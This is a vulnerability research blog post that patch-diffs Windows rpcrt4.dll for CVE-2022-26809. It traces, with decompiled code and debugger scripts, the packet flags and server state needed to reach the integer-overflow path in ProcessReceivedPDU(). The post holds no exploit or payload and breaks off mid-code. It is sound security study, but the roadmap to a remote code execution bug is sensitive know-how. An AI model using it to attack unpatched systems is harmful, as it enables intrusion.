
CVE-2022-26809: Reaching the Vulnerable Point Starting from Zero Knowledge of RPC

Lately, alongside my malware analysis activity, I started to study and test Windows to understand more of its internals. The CVE analyzed here has been a good opportunity to play with RPC and learn new fun things I had never touched before; moreover, it looked challenging enough to be worth the time.

This blogpost shows my roadmap to understand and reproduce the vulnerability. The analysis only aims to reach a PoC of the vulnerability; it does not try to understand every bit of the RPC implementation, nor to write an exploit for it.
RPC, to my basic knowledge, was just a way to call procedures remotely: a client wants to execute a procedure on a server and get the result, much like a syscall between user space and kernel space. In software design this allows decoupling components by goal and purpose, and it often leads to a good separation of privileges. Beyond this high-level view, RPC represents just another attack vector. The RPC protocol is implemented on top of various media or transport protocols, e.g. named pipes, UDP, TCP.
The vulnerability, as reported by Microsoft, is an RCE in the Remote Procedure Call runtime. Neither the location of the bug nor how to trigger it is specified, so it is necessary to obtain the patch and diff it against a vulnerable version of the main library implementing RPC, i.e. rpcrt4.dll.

Below are exactly the steps I took to arrive at the vulnerable point, so the blogpost is more about finding a way without complete knowledge of the analyzed object. Indeed, the information I gathered about RPC internals is presented in the order I discovered it, not in the structured way usually adopted at the end of an analysis.

Search for the vulnerability

Before starting with the usual binary diff, it is necessary to get the right Windows version in order to obtain the vulnerable library. I was lucky: my FLARE VM runs Windows 10 version 21H2, which is vulnerable according to the CPE published by NIST. Before patching the system, the Windows symbols (PDB) must be downloaded so that they are available in Ghidra.

Symbols Download

The symbols can be downloaded with the following commands (the Windows Kits must be installed):

    cd "C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\"
    .\symchk.exe  /s srv*c:\SYMBOLS*https://msdl.microsoft.com/download/symbols C:\Windows\System32\*.dll  


After downloading the symbols, I opened rpcrt4.dll, the library supposed to be vulnerable, in Ghidra, resolved the symbols by loading the right PDB and exported the binary for BinDiff.

The hash of my rpcrt4.dll library is: b35fdb8d452e39cdf4393c09530837eff01d33c7

My Windows version is:

Vulnerable Windows Version


The patch to download, obtained from Microsoft, is the following:

Windows CVE-2022-26809 Patch


After applying the patch, the system contains a new rpcrt4.dll with SHA1: d78a9d416a1187da8550fb0d5a4bace48cfa8179

Windows rpcrt4.dll after patch


Bindiff

To load the patched library into Ghidra, I had to download the symbols again and import the new PDB. After this, both binaries, i.e. the vulnerable and the patched one, are exported for BinDiff and diffed.

The following image makes it clear that the patch introduced new functions and that some others no longer exist.
Diffing Main Info

Indeed, the similarity is only 97%, with ~640 unmatched functions. Since I am not an expert in RPC internals, I started investigating the differences from the functions with a high similarity, close to 100%.

Low diff functions


I was lucky: the fix seems to be in the ProcessReceivedPDU() routine, where the new rpcrt4.dll calls a function that checks the sum of two values.

Vulnerability


So it seems that an integer overflow was the problem in the library.
Now some questions need an answer:

  1. Is the fix introduced in other functions?
  2. How can the bug be reached, i.e. what do we need to trigger it?
  3. How can command execution be gained?

The Patch

The fix calls a function, i.e. UIntAdd(), that sums two values and checks whether an integer overflow happened. The routine is very basic; it was already present in the vulnerable library but never called.
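To make the bug class concrete, the sketch below contrasts a plain 32-bit addition with a checked one in the spirit of UIntAdd(). It is not Microsoft's code: the helper names uint_add_checked() and uint_add_unchecked() are hypothetical, and the 0xffffffff sentinel mimics the UINT_ERROR value that intsafe.h's UIntAdd() stores on overflow.

```c
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical helper mimicking intsafe.h UIntAdd(): returns true and stores
 * the sum when it fits in 32 bits; otherwise returns false and stores the
 * 0xffffffff sentinel (UINT_ERROR in intsafe.h). */
bool uint_add_checked(uint32_t augend, uint32_t addend, uint32_t *result)
{
    uint32_t sum = augend + addend;   /* unsigned addition wraps modulo 2^32 */
    if (sum < augend) {               /* wrapped: the real sum does not fit */
        *result = 0xffffffffu;
        return false;
    }
    *result = sum;
    return true;
}

/* Hypothetical helper showing what an unchecked add does: it silently wraps. */
uint32_t uint_add_unchecked(uint32_t augend, uint32_t addend)
{
    return augend + addend;
}
```

With the unchecked version, a length computed as 0xfffffff0 + 0x20 silently becomes 0x10, the kind of small, wrong size that can lead to an undersized buffer being used later.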

UIntAdd()


As the call references show, the fix has been applied to multiple routines, whereas in the vulnerable code the routine is never used.

UIntAdd() call refs.


At this point, given the multiple new uses of UIntAdd(), I could assume that the bug was an integer overflow, but I was not sure which routine was actually reachable in an easy way for a newbie like me.



Search the way to reach the vulnerable point

Since my knowledge of RPC internals was close to zero, the easiest approach for me was to build an RPC client/server example and set breakpoints on the first instruction of the routines containing the fix:

  1. void OSF_CCONNECTION: OSF_CCALL::ProcessReceivedPDU(OSF_CCALL *this,void *param_1,int param_2) - offset: BaseLibrary + 0x3ac7c
  2. long OSF_CCALL::GetCoalescedBuffer(OSF_CCALL *this,_RPC_MESSAGE *param_1) - offset: BaseLibrary + 0xad10c
  3. long OSF_CCALL::ProcessResponse(OSF_CCALL *this,rpcconn_response *param_1,_RPC_MESSAGE *param_2,int *param_3) - offset: BaseLibrary + 0xae3f8
  4. long OSF_SCALL::GetCoalescedBuffer(OSF_SCALL *this,_RPC_MESSAGE *param_1,int param_2) - offset: BaseLibrary + 0xb35fc

The first example I ran to check whether the vulnerable code is reached in some way is a basic RPC client/server with Windows NT authentication and several protocols selectable via arguments; the example used in this phase is available at: Github

The GitHub link above contains a basic RPC server/client with customizable endpoint/protocol selection and basic WINNT authentication applied only at connection level, RPC_C_AUTHN_LEVEL_CONNECT.

The supported protocols are:

  1. ncacn_np - named pipes are the medium Doc
  2. ncacn_ip_tcp - TCP/IP is the stack on which the RPC messages are sent, indeed the endpoint is a server and port Doc
  3. ncacn_http - IIS is the protocol family, the endpoint is specified with just a port number Doc
  4. ncadg_ip_udp - UDP/IP is the protocol stack on which RPC messages are sent, this is obsolete.
  5. ncalrpc - the protocol is the local interprocess communication, the endpoint is specified with a string at most 53 bytes long Doc
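As a reference for how these protocol sequences are used, a client usually turns protseq, network address and endpoint into a string binding (for example with RpcStringBindingCompose()). The sketch below only reproduces the textual format protseq:network_address[endpoint] in portable C so it can be tried outside Windows; compose_string_binding() is a hypothetical helper, and the object UUID and options parts of the format are left out.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: writes "protseq:netaddr[endpoint]" into out.
 * A NULL netaddr produces an empty address (e.g. for ncalrpc).
 * Returns 0 on success, -1 if the output buffer is too small. */
int compose_string_binding(char *out, size_t out_len, const char *protseq,
                           const char *netaddr, const char *endpoint)
{
    int n = snprintf(out, out_len, "%s:%s[%s]", protseq,
                     netaddr != NULL ? netaddr : "", endpoint);
    if (n < 0 || (size_t)n >= out_len)
        return -1;   /* encoding error or truncated output */
    return 0;
}
```

Assuming client and server run on the same machine, the TCP test described below would correspond to ncacn_ip_tcp:127.0.0.1[5000].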

In my initial tests, I ran the example, RPCServerTest.exe 1 5000, using TCP/IP as the protocol in order to inspect packets with Wireshark. RPC sits on top of a transport protocol, which can vary, and above it there is a common protocol used to call remote procedures, i.e. to pass serialized parameters and choose the routine to execute.

So I ran the example under x64dbg and put breakpoints on the main patched functions, using the following script:

$base_rpcrt4 = rpcrt4:base

$addr = $base_rpcrt4 + 0x3ac7c
lblset $addr, "OSF_SCALL::ProcessReceivedPDU_start"
bp $addr
log "Put BP on {addr} "

$addr = $base_rpcrt4 + 0xad10c
lblset $addr, "OSF_CCALL::GetCoalescedBuffer_start"
bp $addr
log "Put BP on {addr} "

$addr = $base_rpcrt4 + 0xae3f8
lblset $addr, "OSF_CCALL::ProcessResponse_start"
bp $addr
log "Put BP on {addr} "

$addr = $base_rpcrt4 + 0xb35fc
lblset $addr, "OSF_SCALL::GetCoalescedBuffer_start"
bp $addr
log "Put BP on {addr} "


Running the client, RPCClientTest.exe 1 5000, execution stops at OSF_SCALL::ProcessReceivedPDU().



The only patched function hit in the previous test is OSF_SCALL::ProcessReceivedPDU(), reached when the client asks to execute the hello procedure. Now it is necessary to understand what is passed to the function as arguments; from the name alone, it is reasonable to assume the routine processes the received Protocol Data Unit (PDU).

OSF_SCALL::ProcessReceivedPDU()

To understand how the function is called, and therefore which parameters are passed, it is necessary to analyze the functions in the stack trace. Below is how the vulnerable routine is reached in the previous test.

OSF_SCALL::ProcessReceivedPDU(OSF_SCALL *param_1,OSF_SCALL **param_2,byte *param_3,int param_4)
rpcrt4.dll + 0x3ac14 #  OSF_SCALL::BeginRpcCall(longlong *param_1,OSF_SCALL **param_2,OSF_SCALL **param_3)
rpcrt4.dll + 0x3d2ae #  void OSF_SCONNECTION::ProcessReceiveComplete(longlong *param_1,longlong *param_2,OSF_SCALL **param_3,ulonglong param_4)
rpcrt4.dll + 0x4c99c #  void DispatchIOHelper(LOADABLE_TRANSPORT *param_1,int param_2,uint param_3,void *param_4, uint param_5,OSF_SCALL **param_6,void *param_7)
other libraries
...




param1 of OSF_SCALL::ProcessReceivedPDU() should be the class instance that maintains the state of the connection. param2 is just the TCP payload received from the client. param3 could be either the TCP length or the fragment length field; in any case, both seem to be equal every time. param4, at first look, should be something related to the chosen authentication method.

Unfortunately, both param2 and param3 seem to come straight from DispatchIOHelper(), and, as the stack trace shows, DispatchIOHelper() is probably reached asynchronously: maybe a thread waits for messages from clients and starts the dispatcher on every message received.

Before exploring the code, I created a .h file containing the DCE RPC data structure to get a better view in Ghidra.

 typedef struct
{
    char version_major;
    char version_minor;
    char pkt_type;
    char pkt_flags;
    unsigned int data_repres;
    unsigned short fragment_len;
    unsigned short auth_len;
    unsigned int call_id;
    unsigned int alloc_hint;
    unsigned short cxt_id;
    unsigned short opnum;
    char data[256]; // it should be .fragment_len - 24 bytes long
} dce_rpc_t;
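The struct above can also be filled from raw bytes captured in Wireshark. The following is a minimal parsing sketch, assuming a connection-oriented REQUEST PDU; dce_req_hdr and parse_request_header() are hypothetical names. Multi-byte fields are decoded according to the data representation: in DCE RPC, a high nibble of 0x1 in its first byte means little-endian integers, which is also the value compared against 0x10 in ProcessReceiveComplete() further down.

```c
#include <stddef.h>
#include <stdint.h>

/* Fixed 24-byte part of a DCE RPC REQUEST PDU (same fields as dce_rpc_t). */
typedef struct {
    uint8_t  version_major, version_minor, pkt_type, pkt_flags;
    uint8_t  data_repres[4];
    uint16_t fragment_len, auth_len;
    uint32_t call_id, alloc_hint;
    uint16_t cxt_id, opnum;
} dce_req_hdr;

#define DCE_REQ_HDR_LEN 24

static uint16_t rd16(const uint8_t *p, int le)
{
    return le ? (uint16_t)(p[0] | p[1] << 8) : (uint16_t)(p[0] << 8 | p[1]);
}

static uint32_t rd32(const uint8_t *p, int le)
{
    return le ? (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24
              : (uint32_t)p[0] << 24 | (uint32_t)p[1] << 16 | (uint32_t)p[2] << 8 | (uint32_t)p[3];
}

/* Parses the header from raw bytes; returns 0 on success, -1 if too short. */
int parse_request_header(const uint8_t *buf, size_t len, dce_req_hdr *h)
{
    if (len < DCE_REQ_HDR_LEN)
        return -1;
    int le = (buf[4] & 0xf0) == 0x10;   /* integer representation nibble: 1 = little endian */
    h->version_major = buf[0];
    h->version_minor = buf[1];
    h->pkt_type      = buf[2];          /* 0 = REQUEST */
    h->pkt_flags     = buf[3];
    for (int i = 0; i < 4; i++)
        h->data_repres[i] = buf[4 + i];
    h->fragment_len  = rd16(buf + 8, le);
    h->auth_len      = rd16(buf + 10, le);
    h->call_id       = rd32(buf + 12, le);
    h->alloc_hint    = rd32(buf + 16, le);
    h->cxt_id        = rd16(buf + 20, le);
    h->opnum         = rd16(buf + 22, le);
    return 0;
}
```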

Let’s explore the code to better understand what can be done and under which constraints.

The vulnerable code is the following:


To reach that part of the code, some checks must be passed. The following branch must be taken; it is taken every time, and I don’t care why at the moment.


The following branches must not be taken, so the packet sent must be a REQUEST packet to avoid them.


The branch at line 115 must be entered; it is taken every time, maybe due to authentication.

The branch at line 117 in my tests is never taken.

The branch at line 119 must not be taken, otherwise the data sent is overwritten. To avoid it, the packet flags byte must not be negative:

    8th bit (the highest): Object <-- must be 0
    7th bit              : Maybe
    6th bit              : Did not execute
    5th bit              : Multiplex
    4th bit              : Reserved
    3rd bit              : Cancel
    2nd bit              : Last fragment
    1st bit              : First fragment

local_res18 is negative only if the highest bit is set, so to avoid that branch the Object flag must not be set.
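The flag constraints gathered so far can be summarized in a few lines of C. This is a sketch of my reading of the branches, not rpcrt4 code: the PFC_* names follow the DCE 1.1 specification, while pdu_passes_header_checks() is a hypothetical helper. The Object test is written as a bit test, which on the flags byte is equivalent to the “negative” check on local_res18.

```c
#include <stdbool.h>
#include <stdint.h>

/* pfc_flags bits (names from the DCE 1.1 spec), matching the list above. */
enum {
    PFC_FIRST_FRAG      = 0x01,
    PFC_LAST_FRAG       = 0x02,
    PFC_PENDING_CANCEL  = 0x04,
    PFC_RESERVED_1      = 0x08,
    PFC_CONC_MPX        = 0x10,
    PFC_DID_NOT_EXECUTE = 0x20,
    PFC_MAYBE           = 0x40,
    PFC_OBJECT_UUID     = 0x80
};

enum { PTYPE_REQUEST = 0 };

/* Hypothetical helper: true if a PDU satisfies the header constraints found
 * so far on the way to the vulnerable block in ProcessReceivedPDU(). */
bool pdu_passes_header_checks(uint8_t pkt_type, uint8_t pkt_flags)
{
    if (pkt_type != PTYPE_REQUEST)      /* only REQUEST avoids the early branches */
        return false;
    if (pkt_flags & PFC_OBJECT_UUID)    /* flags byte would be negative as a signed char */
        return false;
    if (pkt_flags & PFC_FIRST_FRAG)     /* the next branch needs a non-first fragment */
        return false;
    return true;
}
```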


The branch at line 128 must be entered, so the packet sent must not be the first fragment, i.e. it must not have the first fragment flag set. Since my tests so far had been conducted with this code Github, I decided to implement a client using the Impacket library; it can be found here: Github.


Indeed, with the initial test written in C, the al register (BP at base library + 0x3ad0e), which holds the packet flags, is set to 0x03, i.e. FIRST_FRAG | LAST_FRAG.


On the second packet received from the Impacket client, al contains 0, because a middle fragment is, of course, neither the first nor the last.
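Why the middle packet carries 0 follows from how a request is split into fragments. The sketch below assumes a fixed maximum stub size per fragment (the hypothetical max_frag_data parameter) and computes the pfc_flags each fragment would carry: only the first gets FIRST_FRAG, only the last gets LAST_FRAG, and a request that fits in a single PDU gets both, i.e. 0x03.

```c
#include <stddef.h>
#include <stdint.h>

#define PFC_FIRST_FRAG 0x01
#define PFC_LAST_FRAG  0x02

/* Hypothetical helper: splits a stub of stub_len bytes into fragments of at
 * most max_frag_data bytes (must be > 0), writes the pfc_flags of up to
 * max_out fragments into out and returns the total fragment count. */
size_t fragment_flags(size_t stub_len, size_t max_frag_data,
                      uint8_t *out, size_t max_out)
{
    size_t count = (stub_len + max_frag_data - 1) / max_frag_data;
    if (count == 0)
        count = 1;                      /* an empty stub still needs one PDU */
    for (size_t i = 0; i < count && i < max_out; i++) {
        uint8_t f = 0;
        if (i == 0)
            f |= PFC_FIRST_FRAG;
        if (i == count - 1)
            f |= PFC_LAST_FRAG;
        out[i] = f;                     /* middle fragments end up with 0 */
    }
    return count;
}
```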


The branch at line 130 is always taken, while the one at line 134 is never taken with any client. I did not dig into conditions I did not need to bypass.

So the following condition must be made false:

if ((*(int *)(this + 0x244) == 0) || (*(int *)(this + 0x1cc) != 0))


To avoid the branch, this+0x244 must be non-zero and this+0x1cc must be 0. this+0x244 is set to 1 in the function void OSF_SCALL::BeginRpcCall(longlong *param_1,dce_rpc_t *tcp_payl,OSF_SCALL **param_3):baselibrary+0x8e806.


I focused on the *plVar3 + 0x38 value because *(this + 0x244) is zeroed every time in ActivateCall(), which is called from BeginRpcCall().


OSF_SCONNECTION::LookupBinding() just walks a list until it finds the item matching its second parameter, i.e. the context id passed in the DCE RPC packet.

OSF_SBINDING * __thiscall OSF_SCONNECTION::LookupBinding(OSF_SCONNECTION *this,ushort param_1)

{
  OSF_SBINDING *pOVar1;
  SIMPLE_DICT *this_00;
  ulonglong uVar2;
  uint local_res8 [8];
  
  local_res8[0] = 0;
  this_00 = (SIMPLE_DICT *)(this + 0x80);
  uVar2 = (ulonglong)param_1;
  do {
    pOVar1 = (OSF_SBINDING *)SIMPLE_DICT::Next(this_00,local_res8);
    if (pOVar1 == (OSF_SBINDING *)0x0) {
      return (OSF_SBINDING *)0x0;
    }
  } while (*(int *)(pOVar1 + 8) != (int)uVar2);
  return pOVar1;
}


So it gets every item from the list stored at OSF_SCONNECTION instance + 0x80.

void * __thiscall SIMPLE_DICT::Next(SIMPLE_DICT *this,uint *param_1)

{
  void *pvVar1;
  uint uVar2;
  ulonglong uVar3;
  
  uVar2 = *param_1;
  if (uVar2 < *(uint *)(this + 8)) {
    do {
      uVar3 = (ulonglong)uVar2;
      uVar2 = uVar2 + 1;
      pvVar1 = *(void **)(*(longlong *)this + uVar3 * 8);
      *param_1 = uVar2;
      if (pvVar1 != (void *)0x0) {
        return pvVar1;
      }
    } while (uVar2 < *(uint *)(this + 8));
  }
  *param_1 = 0;
  return (void *)0x0;
}


The routine that walks the dictionary reveals the dictionary implementation: the item count is stored at dictionary+0x8, the pointer at dictionary+0x0 references an array of items, and every item is just 8 bytes long, i.e. a memory address. The second parameter passed to Next() points to a cursor, the index from which the walk resumes; Next() advances it past each item it returns and resets it to 0 at the end. So the vulnerable code is reached only if the value at *plVar3 + 0x38, reached through the item returned by the lookup, has its second bit set:

BeginRpcCall()
....
      plVar3 = (longlong *)
               OSF_SCONNECTION::LookupBinding((OSF_SCONNECTION *)param_1[0x26],tcp_payl->cxt_id); // get the item
      param_1[0x27] = (longlong)plVar3;
      if (plVar3 != (longlong *)0x0) {
        if ((*(byte *)(*plVar3 + 0x38) & 2) != 0) {
                    /* enter here in order to make param1 + 0x244 != 0 */
          *(undefined4 *)((longlong)param_1 + 0x244) = 1;
....
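To check my understanding of the lookup, I modeled it in portable C. The types below are hypothetical and keep only the offsets observed so far (SIMPLE_DICT array pointer and count, binding context id at +0x8, interface flags at +0x38), so this is a sketch of the logic rather than a reproduction of rpcrt4's structures.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical models of the reversed objects. */
typedef struct { uint32_t flags; } iface_model;                        /* flags at +0x38 */
typedef struct { iface_model *iface; uint32_t cxt_id; } binding_model; /* cxt_id at +0x8 */
typedef struct { void **items; uint32_t count; } simple_dict_model;    /* +0x0, +0x8 */

/* Mirrors SIMPLE_DICT::Next(): *cursor is advanced past NULL slots and the
 * returned item; it is reset to 0 when the end of the array is reached. */
void *dict_next(const simple_dict_model *d, uint32_t *cursor)
{
    while (*cursor < d->count) {
        void *item = d->items[(*cursor)++];
        if (item != NULL)
            return item;
    }
    *cursor = 0;
    return NULL;
}

/* Mirrors OSF_SCONNECTION::LookupBinding(): first binding with this context id. */
binding_model *lookup_binding(const simple_dict_model *d, uint16_t cxt_id)
{
    uint32_t cursor = 0;
    binding_model *b;
    while ((b = dict_next(d, &cursor)) != NULL)
        if (b->cxt_id == cxt_id)
            return b;
    return NULL;
}

/* The test in BeginRpcCall(): binding found and interface flag bit 0x2 set. */
int begin_call_sets_0x244(const simple_dict_model *d, uint16_t cxt_id)
{
    binding_model *b = lookup_binding(d, cxt_id);
    return b != NULL && (b->iface->flags & 2) != 0;
}
```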


Below are the structure links, starting from the connection instance structure and ending with the structure containing the checked flag, which could lead us to set instance(OSF_SCONNECTION) + 0x244 to 1.

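typedef struct
{
  ...
  offset 0x130: dictionary_t *dictionary; // this[0x26], passed to LookupBinding()
  ...
  offset 0x244: uint32_t flag; // must be 1 to enter the vulnerable code block in ProcessReceivedPDU()
  ...
} OSF_SCONNECTION_t;

typedef struct
{
  ...
  offset 0x80: items_list_t itemslist; // embedded SIMPLE_DICT, LookupBinding() uses this + 0x80
  ...
} dictionary_t;

typedef struct
{
  offset 0x0: item_t **items;    // array of items_no item pointers
  offset 0x8: uint32_t items_no;
  ...
} items_list_t;

typedef struct
{
  offset 0x0: flags_check_t *flags;
  offset 0x8: uint32_t cxt_id;   // compared with the packet context id in LookupBinding()
  ...
} item_t;

typedef struct
{
  ...
  offset 0x38: uint32_t flag_checked; // second bit tested in BeginRpcCall()
  ...
} flags_check_t;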


At this point it is important to understand where the dictionary is created and where the value is set. I found that the dictionary address changes on every connection, so it should be created when the client connects.

To find where the dictionary is assigned to this[0x26], i.e. in the OSF_SCONNECTION instance, I placed a write breakpoint on the memory address that stores the dictionary address, i.e. this[0x26].

This reveals where the dictionary is inserted into the instance object.


It seems to be created at: rpcrt4.dll+0x3668f:OSF_SCALL::OSF_SCALL()


Below is the stack trace:

rpcrt4.dll+0x3668f:OSF_SCALL::OSF_SCALL()
rpcrt4.dll+0x3620a:OSF_SCONNECTION::OSF_SCONNECTION()
rpcrt4.dll+0xd8e55:WS_NewConnection(CO_ADDRESS *param_1,BASE_CONNECTION **param_2)
rpcrt4.dll+0x4e266:CO_AddressThreadPoolCallback()


LookupBinding(dictionary, item) searches for the item starting from param1+0x80, and there is just one client connecting.


Below, the debugger shows the chain from the connection instance to the flag contained in the item returned by the lookup.


The dictionary is filled with an already instantiated item, i.e. with the flag already set, in the OSF_SCONNECTION::ProcessPContextList() routine. This routine is reached through the following stack:

rpcrt4.dll + 0x3e4f5: SIMPLE_DICT::Insert() 
rpcrt4.dll + 0x39473: OSF_SCONNECTION::ProcessPContextList()
rpcrt4.dll + 0x38b31: OSF_SCONNECTION::AssociationRequested()
rpcrt4.dll + 0x3d3b6: OSF_SCONNECTION::ProcessReceiveComplete()

OSF_SCONNECTION::ProcessReceiveComplete() is called every time a packet arrives from the client. The S in the class name (OSF_SCONNECTION rather than OSF_CCONNECTION) means that the routine is used by RPC servers.


This routine, OSF_SCONNECTION::ProcessPContextList(), stores the context id in a new dictionary item; from it, the exact structure of the dictionary items at instance(OSF_SCONNECTION)[0x26] can be derived. Unfortunately, the item, i.e. the structure containing the flag to force, is not initialized on every connection.
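For reference, the context id stored here comes from the presentation context list of the BIND PDU. The sketch below mirrors the p_cont_elem_t layout from the DCE 1.1 wire format (also used by MS-RPCE), with hypothetical *_model type names; it is not taken from rpcrt4, and transfer_syntaxes is declared with one entry although n_transfer_syn entries appear on the wire.

```c
#include <stddef.h>
#include <stdint.h>

/* 16-byte UUID as laid out on the wire. */
typedef struct {
    uint32_t time_low;
    uint16_t time_mid;
    uint16_t time_hi_and_version;
    uint8_t  clock_seq_and_node[8];
} uuid_model;

/* Interface (or transfer syntax) identifier: UUID plus version, 20 bytes. */
typedef struct {
    uuid_model if_uuid;
    uint32_t   if_version;
} p_syntax_id_model;

/* One presentation context: maps a context id (later sent as cxt_id in
 * REQUEST PDUs) to the interface the client wants to bind. */
typedef struct {
    uint16_t          p_cont_id;
    uint8_t           n_transfer_syn;
    uint8_t           reserved;
    p_syntax_id_model abstract_syntax;       /* the interface being bound */
    p_syntax_id_model transfer_syntaxes[1];  /* n_transfer_syn entries on the wire */
} p_cont_elem_model;

_Static_assert(sizeof(uuid_model) == 16, "UUID is 16 bytes");
_Static_assert(sizeof(p_syntax_id_model) == 20, "syntax id is 20 bytes");
_Static_assert(offsetof(p_cont_elem_model, abstract_syntax) == 4, "abstract syntax at +4");
```

With a single transfer syntax each element is 44 bytes, which matches what Wireshark shows for a typical bind context item.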

Indeed, I added a breakpoint on the flag’s memory address to track the instructions overwriting it. I expected some free/alloc on every connection, just like for the dictionary, but this never happened. This led me to think that it is created during RPC server initialization.

The item address, i.e. the object containing the flag to force, is retrieved and stored in the dictionary at:

0x57b54 RPC_SERVER::FindInterfaceTransfer()

                           
offset: 0x57a6c | mov rsi,qword ptr ds:[GlobalRpcServer]          ; RSI will contain the address of GlobalRPCServer
offset: 0x57aae | mov rdx,qword ptr ds:[rsi+120]                  ; most likely address of items                
offset: 0x57ab9 | mov rdi,qword ptr ds:[rdx+rax*8]                ; get the ith item       
offset: 0x57b30 | call RPC_INTERFACE::SelectTransferSyntax        ; check if the connection match with the interface                         
offset: 0x57b35 | test eax,eax                                    ; if eax == 0 return, interface/item found! 
offset: 0x57b54 | mov qword ptr ds:[rax],rdi                      ; Address of the item with the flag to force is returned writing it in *rax 

Basically, RPC_SERVER::FindInterfaceTransfer() is called by ProcessPContextList(), most likely to find the RPC interface matching the information sent by the client, for example the UUID value.

Below is the debugger view at 0x57b54.


Since GlobalRpcServer is at a fixed address and contains the address of the struct holding the items, I just looked at the write references in Ghidra and found where GlobalRpcServer is filled with the struct address.

wchar_t ** InitializeRpcServer(undefined8 param_1,uchar **param_2,SIZE_T param_3)
{
  ppwVar24 = (wchar_t **)0x0;
  local_res8[0]._0_4_ = 0;
  ppwVar19 = ppwVar24;
  if (GlobalRpcServer == (RPC_SERVER *)0x0) {
    this = (RPC_SERVER *)AllocWrapper(0x1f0,param_2,param_3);
    ppwVar5 = ppwVar24;
    if (this != (RPC_SERVER *)0x0) {
      param_2 = local_res8;
      ppwVar5 = (wchar_t **)RPC_SERVER::RPC_SERVER(this,(long *)param_2);
      ppwVar19 = (wchar_t **)(ulonglong)(uint)local_res8[0];
    }
    if (ppwVar5 == (wchar_t **)0x0) {
      GlobalRpcServer = (RPC_SERVER *)ppwVar5; 
      return (wchar_t **)0xe;
    }
    GlobalRpcServer = (RPC_SERVER *)ppwVar5; // OFFSET: 0xb3d2; here the global rpc server is set to a new fresh memory.
    ...
  }
  ...
}


The routine InitializeRpcServer() is reached from RpcServerUseProtseqEpW(), which is called directly by the RPC server! As shown in the debugger view, *GlobalRpcServer + 0x120 is already filled, but *(*GlobalRpcServer + 0x120) is NULL.


By setting a breakpoint on memory write at *(*GlobalRpcServer + 0x120), I found where the item address is set! Below is the stack trace:

rpcrt4.dll + 0x3e4f9 at SIMPLE_DICT::Insert() 
rpcrt4.dll + 0xd498  at RPC_INTERFACE * RPC_SERVER::FindOrCreateInterfaceInternal()
rpcrt4.dll + 0xd196  at void RPC_SERVER::RegisterInterface() 
rpcrt4.dll + 0x7271e at void RpcServerRegisterIf()
server rpc function 


From the memory contents shown below:


*item + 0x38 appears to be NULL, so let’s set a breakpoint on that memory address. To sum up, the flag to force is reachable from:

typedef struct
{
  rpc_interfaces_t **addresses;
}GlobalRpcServer_t;

typedef struct
{
  ...
  offset 0x120:  item_t **items
  ...
}rpc_interfaces_t;

typedef struct
{
  ...
  offset 0x38:  uint32_t flag_checked // Flag check in BeginRpcCall()
  ...
}item_t

It was clear that our flag had not been set yet, so I set another write breakpoint on *item + 0x38 to find where it is set, and found the point where the flag is modified, as visible in the debugger.


The code that modifies the flag is reached through this stack trace.

rpcrt4.dll + 0xd30e : RPC_INTERFACE::RegisterTypeManager() 
rpcrt4.dll + 0xd1bf : void RPC_SERVER::RegisterInterface() 
rpcrt4.dll + 0x7271e: void RpcServerRegisterIf() 
RPC server functions


void RpcServerRegisterIf(uint *param_1,uint *uuid,SIZE_T param_3)

{
  ...
    RPC_SERVER::RegisterInterface
              (GlobalRpcServer,param_1,uuid,param_3,0,0x4d2,gMaxRpcSize,(FuncDef2 *)0x0,
               (ushort **)0x0,(RPCP_INTERFACE_GROUP *)0x0);

  ...
}

void RPC_SERVER::RegisterInterface
               (RPC_SERVER *param_1,uint *param_2,uint *param_3,SIZE_T param_4,uint param_5,
               uint param_6,uint param_7,FuncDef2 *param_8,ushort **param_9,
               RPCP_INTERFACE_GROUP *param_10)

{
  if (param_3 != (uint *)0x0) {
    local_80 = param_3;
  }
  local_58 = ZEXT816(0);
  local_78 = param_2;
  local_60 = param_3;
  ...
  puVar6 = RPC_INTERFACE::RegisterTypeManager(pRVar5,local_60,param_4);
  ...
}

RPC_INTERFACE::RegisterTypeManager(RPC_INTERFACE *param_1,undefined4 *param_2,SIZE_T param_3)
{
  ...
  if ((param_2 == (undefined4 *)0x0) ||
     (iVar6 = RPC_UUID::IsNullUuid((RPC_UUID *)param_2), iVar6 != 0)) {
    if ((*(uint *)(param_1 + 0x38) & 1) == 0) {
      *(int *)(param_1 + 200) = *(int *)(param_1 + 200) + 1;
      *(uint *)(param_1 + 0x38) = *(uint *)(param_1 + 0x38) | 1; // SET to 1 the flag!
      *(SIZE_T *)(param_1 + 0x40) = param_3;
      RtlLeaveCriticalSection(pRVar1);
      return (undefined4 *)0x0;
    }
    puVar11 = (undefined4 *)0x6b0;
  }
  ...
}

Looking at the stack trace and the code, it is clear that bit 0 of the flag gets set because the RPC server calls RpcServerRegisterIf() without specifying any MgrTypeUuid. At this point it seemed likely that I could somehow alter, from the client side, the flag that triggers the vulnerable code.

Anyway, back to BeginRpcCall(): to execute the vulnerable code, the item_t flag value must have its second bit set. Since that bit is never written, I could no longer use the debugger to find where it is set. So I searched for instruction patterns based on the information I had:

  1. The value is a bitmask flag: this was clear because it is checked with TEST instructions and because the value 1 was set with an OR operation.
  2. item_t is a kind of structure, so accesses to the flag member most likely look the same, i.e. [register + 0x38].
  3. The flag is 4 bytes long.

Based on this information, I searched for instructions like: or dword ptr [anyreg+0x38], 2
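The same search can be done on raw bytes. The sketch below, with the hypothetical function find_or_flag2_at_0x38(), looks for the x64 encoding 83 /1 ib with an 8-bit displacement of 0x38 and an immediate of 2, e.g. 83 4F 38 02 for or dword ptr [rdi+38h], 2. It is deliberately narrow: it skips the SIB form, disp32 and byte-sized variants, and a linear byte scan can also match bytes that are not at an instruction boundary, so every hit must be confirmed in the disassembler.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical scanner for "or dword ptr [reg+0x38], 2":
 *   [REX] 83 /1 ib, ModRM mod=01 (disp8), reg=001 (/1 = OR), disp8=0x38, imm8=0x02.
 * rm == 100b would need a SIB byte and is skipped. Returns the offset of
 * the 0x83 opcode byte at or after start, or -1 if nothing matches. */
long find_or_flag2_at_0x38(const uint8_t *code, size_t len, size_t start)
{
    for (size_t i = start; i + 4 <= len; i++) {
        if (code[i] != 0x83)
            continue;
        uint8_t modrm = code[i + 1];
        int mod = modrm >> 6, reg = (modrm >> 3) & 7, rm = modrm & 7;
        if (mod == 1 && reg == 1 && rm != 4 &&
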